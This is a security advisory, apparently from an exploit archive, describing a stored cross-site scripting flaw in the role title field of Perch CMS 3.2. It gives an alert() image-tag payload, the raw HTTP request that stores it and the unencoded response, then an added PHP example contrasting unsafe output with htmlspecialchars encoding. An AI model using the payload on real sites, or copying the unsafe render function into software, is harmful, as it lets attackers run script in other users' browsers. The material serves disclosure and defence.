Perch CMS 3.2 Cross Site Scripting

2023.08.02
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title:
# Date: 07/2023
# Exploit Author: Andrey Stoykov
# Version: 3.2
# Tested on: Windows Server 2022
# Blog: http://msecureltd.blogspot.com


XSS #1:

File: roles.edit.post.php

Line #57:

[...]
<div class="field-wrap <?php echo $Form->error('roleTitle', false);?>">
    <?php echo $Form->label('roleTitle', 'Title'); ?>
    <div class="form-entry">
        <?php echo $Form->text('roleTitle', $Form->get($details, 'roleTitle')); ?>
    </div>
</div>
[...]


Steps to Reproduce:

1. Login to application
2. Go to Roles
3. Select Title
4. Enter payload TEST"><img src=x onerror=alert(1)>


// HTTP POST request

POST /perch/perch/core/users/roles/edit/?id=1 HTTP/1.1
Host: 192.168.1.11
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
[...]

roleTitle=TEST%22%3e%3cimg+src%3dx+onerror%3dalert%281%29%3e&privs-perch%5b%5d=1&btnsubmit=Save+changes&formaction=core&token=0389a6698f1911a162fdb71328dd2af0


// HTTP response

HTTP/1.1 200 OK
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
[...]

[...]
<a href="/perch/perch/core/users/roles/edit/?id=1">TEST"><img src=x onerror=alert(1)></a>
[...]
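
The HTTP response above shows the stored role title written into the page without HTML encoding. The following is an added example, not Perch CMS source and not part of the advisory: it contrasts an unencoded render of the role link with one encoded at output time, using the payload from the reproduction steps. All function names are hypothetical.

```php
<?php
// Added illustration; not Perch CMS source. Function names are hypothetical.

// Unencoded render: mirrors the behaviour seen in the HTTP response above.
function render_role_link_unsafe(int $id, string $title): string
{
    return '<a href="/perch/perch/core/users/roles/edit/?id=' . $id . '">' . $title . '</a>';
}

// Encode for the HTML context at output time. ENT_QUOTES covers both quote
// styles, so the helper is usable in element text and in quoted attributes;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_role_link_safe(int $id, string $title): string
{
    return '<a href="/perch/perch/core/users/roles/edit/?id=' . $id . '">' . h($title) . '</a>';
}

// A text input carries the value in a quoted attribute; that context
// needs the same encoding so a double quote cannot close the attribute.
function render_role_input_safe(string $title): string
{
    return '<input type="text" name="roleTitle" value="' . h($title) . '">';
}

// Payload from the advisory's reproduction steps, as stored after URL decoding.
$title = 'TEST"><img src=x onerror=alert(1)>';

echo render_role_link_unsafe(1, $title), PHP_EOL; // title is parsed as markup
echo render_role_link_safe(1, $title), PHP_EOL;   // title is rendered as text
echo render_role_input_safe($title), PHP_EOL;     // title stays inside value=""

// Regression check: no raw "<", ">" or double quote from the title survives.
if (preg_match('/[<>"]/', h($title)) === 1) {
    throw new RuntimeException('role title was not HTML-encoded');
}
```

Encoding belongs at every point where the title is written into HTML (the roles listing and the edit form), since the value is stored and rendered again on later requests.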

